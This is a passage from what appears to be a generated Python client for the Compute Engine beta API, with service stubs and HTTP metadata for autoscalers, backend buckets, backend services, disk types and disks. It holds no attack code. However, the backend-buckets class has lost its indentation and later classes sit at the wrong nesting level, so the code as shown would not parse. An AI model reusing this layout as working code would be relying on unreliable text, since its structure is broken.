      Returns:
        (TestPermissionsResponse) The response message.
      """
      config = self.GetMethodConfig('TestIamPermissions')
      return self._RunMethod(
          config, request, global_params=global_params)

    TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.autoscalers.testIamPermissions',
        ordered_params=[u'project', u'zone', u'resource'],
        path_params=[u'project', u'resource', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/autoscalers/{resource}/testIamPermissions',
        request_field=u'testPermissionsRequest',
        request_type_name=u'ComputeAutoscalersTestIamPermissionsRequest',
        response_type_name=u'TestPermissionsResponse',
        supports_download=False,
    )

    def Update(self, request, global_params=None):
      """Updates an autoscaler in the specified project using the data included in the request.

      Args:
        request: (ComputeAutoscalersUpdateRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Update')
      return self._RunMethod(
          config, request, global_params=global_params)

    Update.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PUT',
        method_id=u'compute.autoscalers.update',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'autoscaler', u'requestId'],
        relative_path=u'projects/{project}/zones/{zone}/autoscalers',
        request_field=u'autoscalerResource',
        request_type_name=u'ComputeAutoscalersUpdateRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class BackendBucketsService(base_api.BaseApiService):
"""Service class for the backendBuckets resource."""
_NAME = u'backendBuckets'
def __init__(self, client):
super(ComputeBeta.BackendBucketsService, self).__init__(client)
self._upload_configs = {
}
def AddSignedUrlKey(self, request, global_params=None):
"""Adds the given Signed URL Key to the backend bucket.
Args:
request: (ComputeBackendBucketsAddSignedUrlKeyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddSignedUrlKey')
return self._RunMethod(
config, request, global_params=global_params)
AddSignedUrlKey.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendBuckets.addSignedUrlKey',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}/addSignedUrlKey',
request_field=u'signedUrlKey',
request_type_name=u'ComputeBackendBucketsAddSignedUrlKeyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified BackendBucket resource.
Args:
request: (ComputeBackendBucketsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.backendBuckets.delete',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field='',
request_type_name=u'ComputeBackendBucketsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteSignedUrlKey(self, request, global_params=None):
"""Deletes the given Signed URL Key from the backend bucket.
Args:
request: (ComputeBackendBucketsDeleteSignedUrlKeyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteSignedUrlKey')
return self._RunMethod(
config, request, global_params=global_params)
DeleteSignedUrlKey.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendBuckets.deleteSignedUrlKey',
ordered_params=[u'project', u'backendBucket', u'keyName'],
path_params=[u'backendBucket', u'project'],
query_params=[u'keyName', u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}/deleteSignedUrlKey',
request_field='',
request_type_name=u'ComputeBackendBucketsDeleteSignedUrlKeyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified BackendBucket resource. Get a list of available backend buckets by making a list() request.
Args:
request: (ComputeBackendBucketsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendBucket) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendBuckets.get',
ordered_params=[u'project', u'backendBucket'],
path_params=[u'backendBucket', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
request_field='',
request_type_name=u'ComputeBackendBucketsGetRequest',
response_type_name=u'BackendBucket',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a BackendBucket resource in the specified project using the data included in the request.
Args:
request: (ComputeBackendBucketsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.backendBuckets.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/backendBuckets',
request_field=u'backendBucket',
request_type_name=u'ComputeBackendBucketsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of BackendBucket resources available to the specified project.
Args:
request: (ComputeBackendBucketsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendBucketList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.backendBuckets.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/backendBuckets',
request_field='',
request_type_name=u'ComputeBackendBucketsListRequest',
response_type_name=u'BackendBucketList',
supports_download=False,
)
def Patch(self, request, global_params=None):
  """Updates the specified BackendBucket resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

  Args:
    request: (ComputeBackendBucketsPatchRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (Operation) The response message.
  """
  # Fetch the declarative wire metadata registered below, then delegate
  # the actual HTTP round trip to the shared base-class machinery.
  config = self.GetMethodConfig('Patch')
  return self._RunMethod(
      config, request, global_params=global_params)

# Wire metadata for Patch: partial (JSON merge patch) update of one
# backend bucket; the backendBucketResource field carries the body.
Patch.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'PATCH',
    method_id=u'compute.backendBuckets.patch',
    ordered_params=[u'project', u'backendBucket'],
    path_params=[u'backendBucket', u'project'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
    request_field=u'backendBucketResource',
    request_type_name=u'ComputeBackendBucketsPatchRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Update(self, request, global_params=None):
  """Updates the specified BackendBucket resource with the data included in the request.

  Args:
    request: (ComputeBackendBucketsUpdateRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (Operation) The response message.
  """
  # Fetch the declarative wire metadata registered below, then delegate
  # the actual HTTP round trip to the shared base-class machinery.
  config = self.GetMethodConfig('Update')
  return self._RunMethod(
      config, request, global_params=global_params)

# Wire metadata for Update: full-replacement PUT of one backend bucket;
# the backendBucketResource field carries the body.
Update.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'PUT',
    method_id=u'compute.backendBuckets.update',
    ordered_params=[u'project', u'backendBucket'],
    path_params=[u'backendBucket', u'project'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/global/backendBuckets/{backendBucket}',
    request_field=u'backendBucketResource',
    request_type_name=u'ComputeBackendBucketsUpdateRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
class BackendServicesService(base_api.BaseApiService):
  """Service class for the backendServices resource.

  Generated service stub: each public method looks up its declarative wire
  metadata (attached below it as a ``method_config`` lambda) and delegates
  the HTTP round trip to the shared base-class machinery.
  """

  # Resource-collection name this service is registered under.
  _NAME = u'backendServices'

  def __init__(self, client):
    super(ComputeBeta.BackendServicesService, self).__init__(client)
    # No media-upload configurations are defined for this service.
    self._upload_configs = {
        }

  def AddSignedUrlKey(self, request, global_params=None):
    """Adds the given Signed URL Key to the specified backend service.

    Args:
      request: (ComputeBackendServicesAddSignedUrlKeyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('AddSignedUrlKey')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for AddSignedUrlKey: POST, body carried by signedUrlKey.
  AddSignedUrlKey.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendServices.addSignedUrlKey',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/backendServices/{backendService}/addSignedUrlKey',
      request_field=u'signedUrlKey',
      request_type_name=u'ComputeBackendServicesAddSignedUrlKeyRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def AggregatedList(self, request, global_params=None):
    """Retrieves the list of all BackendService resources, regional and global, available to the specified project.

    Args:
      request: (ComputeBackendServicesAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendServiceAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for AggregatedList: paginated GET, no request body.
  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.backendServices.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/backendServices',
      request_field='',
      request_type_name=u'ComputeBackendServicesAggregatedListRequest',
      response_type_name=u'BackendServiceAggregatedList',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified BackendService resource.

    Args:
      request: (ComputeBackendServicesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Delete: DELETE on a single backend service.
  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.backendServices.delete',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/backendServices/{backendService}',
      request_field='',
      request_type_name=u'ComputeBackendServicesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def DeleteSignedUrlKey(self, request, global_params=None):
    """Deletes the given Signed URL Key from the specified backend service.

    Args:
      request: (ComputeBackendServicesDeleteSignedUrlKeyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('DeleteSignedUrlKey')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for DeleteSignedUrlKey: POST with keyName as a query
  # parameter rather than a request body.
  DeleteSignedUrlKey.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendServices.deleteSignedUrlKey',
      ordered_params=[u'project', u'backendService', u'keyName'],
      path_params=[u'backendService', u'project'],
      query_params=[u'keyName', u'requestId'],
      relative_path=u'projects/{project}/global/backendServices/{backendService}/deleteSignedUrlKey',
      request_field='',
      request_type_name=u'ComputeBackendServicesDeleteSignedUrlKeyRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified BackendService resource. Get a list of available backend services by making a list() request.

    Args:
      request: (ComputeBackendServicesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendService) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Get: GET of a single backend service.
  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.backendServices.get',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices/{backendService}',
      request_field='',
      request_type_name=u'ComputeBackendServicesGetRequest',
      response_type_name=u'BackendService',
      supports_download=False,
  )

  def GetHealth(self, request, global_params=None):
    """Gets the most recent health check results for this BackendService.

    Args:
      request: (ComputeBackendServicesGetHealthRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendServiceGroupHealth) The response message.
    """
    config = self.GetMethodConfig('GetHealth')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for GetHealth: POST, body carried by
  # resourceGroupReference.
  GetHealth.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendServices.getHealth',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices/{backendService}/getHealth',
      request_field=u'resourceGroupReference',
      request_type_name=u'ComputeBackendServicesGetHealthRequest',
      response_type_name=u'BackendServiceGroupHealth',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a BackendService resource in the specified project using the data included in the request. There are several restrictions and guidelines to keep in mind when creating a backend service. Read Restrictions and Guidelines for more information.

    Args:
      request: (ComputeBackendServicesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Insert: POST, body carried by backendService.
  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendServices.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/backendServices',
      request_field=u'backendService',
      request_type_name=u'ComputeBackendServicesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves the list of BackendService resources available to the specified project.

    Args:
      request: (ComputeBackendServicesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (BackendServiceList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for List: paginated GET, no request body.
  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.backendServices.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/backendServices',
      request_field='',
      request_type_name=u'ComputeBackendServicesListRequest',
      response_type_name=u'BackendServiceList',
      supports_download=False,
  )

  def Patch(self, request, global_params=None):
    """Patches the specified BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.

    Args:
      request: (ComputeBackendServicesPatchRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Patch')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Patch: partial update, body carried by
  # backendServiceResource.
  Patch.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PATCH',
      method_id=u'compute.backendServices.patch',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/backendServices/{backendService}',
      request_field=u'backendServiceResource',
      request_type_name=u'ComputeBackendServicesPatchRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetSecurityPolicy(self, request, global_params=None):
    """Sets the security policy for the specified backend service.

    Args:
      request: (ComputeBackendServicesSetSecurityPolicyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetSecurityPolicy')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for SetSecurityPolicy: POST, body carried by
  # securityPolicyReference.
  SetSecurityPolicy.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendServices.setSecurityPolicy',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/backendServices/{backendService}/setSecurityPolicy',
      request_field=u'securityPolicyReference',
      request_type_name=u'ComputeBackendServicesSetSecurityPolicyRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeBackendServicesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for TestIamPermissions: POST, body carried by
  # testPermissionsRequest.
  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.backendServices.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/backendServices/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeBackendServicesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )

  def Update(self, request, global_params=None):
    """Updates the specified BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information.

    Args:
      request: (ComputeBackendServicesUpdateRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Update')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Update: full-replacement PUT, body carried by
  # backendServiceResource.
  Update.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'PUT',
      method_id=u'compute.backendServices.update',
      ordered_params=[u'project', u'backendService'],
      path_params=[u'backendService', u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/backendServices/{backendService}',
      request_field=u'backendServiceResource',
      request_type_name=u'ComputeBackendServicesUpdateRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class DiskTypesService(base_api.BaseApiService):
  """Service class for the diskTypes resource.

  Generated service stub: each public method looks up its declarative wire
  metadata (attached below it as a ``method_config`` lambda) and delegates
  the HTTP round trip to the shared base-class machinery.
  """

  # Resource-collection name this service is registered under.
  _NAME = u'diskTypes'

  def __init__(self, client):
    super(ComputeBeta.DiskTypesService, self).__init__(client)
    # No media-upload configurations are defined for this service.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of disk types.

    Args:
      request: (ComputeDiskTypesAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (DiskTypeAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for AggregatedList: paginated GET, no request body.
  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.diskTypes.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/diskTypes',
      request_field='',
      request_type_name=u'ComputeDiskTypesAggregatedListRequest',
      response_type_name=u'DiskTypeAggregatedList',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns the specified disk type. Get a list of available disk types by making a list() request.

    Args:
      request: (ComputeDiskTypesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (DiskType) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Get: GET of a single zonal disk type.
  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.diskTypes.get',
      ordered_params=[u'project', u'zone', u'diskType'],
      path_params=[u'diskType', u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/diskTypes/{diskType}',
      request_field='',
      request_type_name=u'ComputeDiskTypesGetRequest',
      response_type_name=u'DiskType',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of disk types available to the specified project.

    Args:
      request: (ComputeDiskTypesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (DiskTypeList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for List: paginated GET over one zone, no request body.
  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.diskTypes.list',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/zones/{zone}/diskTypes',
      request_field='',
      request_type_name=u'ComputeDiskTypesListRequest',
      response_type_name=u'DiskTypeList',
      supports_download=False,
  )
class DisksService(base_api.BaseApiService):
  """Service class for the disks resource.

  Generated service stub: each public method looks up its declarative wire
  metadata (attached below it as a ``method_config`` lambda) and delegates
  the HTTP round trip to the shared base-class machinery.
  """

  # Resource-collection name this service is registered under.
  _NAME = u'disks'

  def __init__(self, client):
    super(ComputeBeta.DisksService, self).__init__(client)
    # No media-upload configurations are defined for this service.
    self._upload_configs = {
        }

  def AggregatedList(self, request, global_params=None):
    """Retrieves an aggregated list of persistent disks.

    Args:
      request: (ComputeDisksAggregatedListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (DiskAggregatedList) The response message.
    """
    config = self.GetMethodConfig('AggregatedList')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for AggregatedList: paginated GET, no request body.
  AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.disks.aggregatedList',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/aggregated/disks',
      request_field='',
      request_type_name=u'ComputeDisksAggregatedListRequest',
      response_type_name=u'DiskAggregatedList',
      supports_download=False,
  )

  def CreateSnapshot(self, request, global_params=None):
    """Creates a snapshot of a specified persistent disk.

    Args:
      request: (ComputeDisksCreateSnapshotRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('CreateSnapshot')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for CreateSnapshot: POST, body carried by snapshot.
  CreateSnapshot.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.disks.createSnapshot',
      ordered_params=[u'project', u'zone', u'disk'],
      path_params=[u'disk', u'project', u'zone'],
      query_params=[u'guestFlush', u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/disks/{disk}/createSnapshot',
      request_field=u'snapshot',
      request_type_name=u'ComputeDisksCreateSnapshotRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Delete(self, request, global_params=None):
    """Deletes the specified persistent disk. Deleting a disk removes its data permanently and is irreversible. However, deleting a disk does not delete any snapshots previously made from the disk. You must separately delete snapshots.

    Args:
      request: (ComputeDisksDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Delete')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Delete: DELETE on a single zonal disk.
  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.disks.delete',
      ordered_params=[u'project', u'zone', u'disk'],
      path_params=[u'disk', u'project', u'zone'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/disks/{disk}',
      request_field='',
      request_type_name=u'ComputeDisksDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Returns a specified persistent disk. Get a list of available persistent disks by making a list() request.

    Args:
      request: (ComputeDisksGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Disk) The response message.
    """
    config = self.GetMethodConfig('Get')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Get: GET of a single zonal disk.
  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.disks.get',
      ordered_params=[u'project', u'zone', u'disk'],
      path_params=[u'disk', u'project', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/disks/{disk}',
      request_field='',
      request_type_name=u'ComputeDisksGetRequest',
      response_type_name=u'Disk',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Creates a persistent disk in the specified project using the data in the request. You can create a disk with a sourceImage, a sourceSnapshot, or create an empty 500 GB data disk by omitting all properties. You can also create a disk that is larger than the default size by specifying the sizeGb property.

    Args:
      request: (ComputeDisksInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Insert')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Insert: POST, body carried by disk; sourceImage is
  # passed as a query parameter.
  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.disks.insert',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'requestId', u'sourceImage'],
      relative_path=u'projects/{project}/zones/{zone}/disks',
      request_field=u'disk',
      request_type_name=u'ComputeDisksInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieves a list of persistent disks contained within the specified zone.

    Args:
      request: (ComputeDisksListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (DiskList) The response message.
    """
    config = self.GetMethodConfig('List')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for List: paginated GET over one zone, no request body.
  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.disks.list',
      ordered_params=[u'project', u'zone'],
      path_params=[u'project', u'zone'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/zones/{zone}/disks',
      request_field='',
      request_type_name=u'ComputeDisksListRequest',
      response_type_name=u'DiskList',
      supports_download=False,
  )

  def Resize(self, request, global_params=None):
    """Resizes the specified persistent disk. You can only increase the size of the disk.

    Args:
      request: (ComputeDisksResizeRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('Resize')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for Resize: POST, body carried by disksResizeRequest.
  Resize.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.disks.resize',
      ordered_params=[u'project', u'zone', u'disk'],
      path_params=[u'disk', u'project', u'zone'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/disks/{disk}/resize',
      request_field=u'disksResizeRequest',
      request_type_name=u'ComputeDisksResizeRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetLabels(self, request, global_params=None):
    """Sets the labels on a disk. To learn more about labels, read the Labeling Resources documentation.

    Args:
      request: (ComputeDisksSetLabelsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    config = self.GetMethodConfig('SetLabels')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for SetLabels: POST, body carried by
  # zoneSetLabelsRequest.
  SetLabels.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.disks.setLabels',
      ordered_params=[u'project', u'zone', u'resource'],
      path_params=[u'project', u'resource', u'zone'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/zones/{zone}/disks/{resource}/setLabels',
      request_field=u'zoneSetLabelsRequest',
      request_type_name=u'ComputeDisksSetLabelsRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Returns permissions that a caller has on the specified resource.

    Args:
      request: (ComputeDisksTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    config = self.GetMethodConfig('TestIamPermissions')
    return self._RunMethod(
        config, request, global_params=global_params)

  # Wire metadata for TestIamPermissions: POST, body carried by
  # testPermissionsRequest.
  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.disks.testIamPermissions',
      ordered_params=[u'project', u'zone', u'resource'],
      path_params=[u'project', u'resource', u'zone'],
      query_params=[],
      relative_path=u'projects/{project}/zones/{zone}/disks/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeDisksTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class FirewallsService(base_api.BaseApiService):
  """Service class for the firewalls resource.

  Generated service stub: each public method looks up its declarative wire
  metadata (attached below it as a ``method_config`` lambda) and delegates
  the HTTP round trip to the shared base-class machinery.
  """

  # Resource-collection name this service is registered under.
  _NAME = u'firewalls'

  def __init__(self, client):
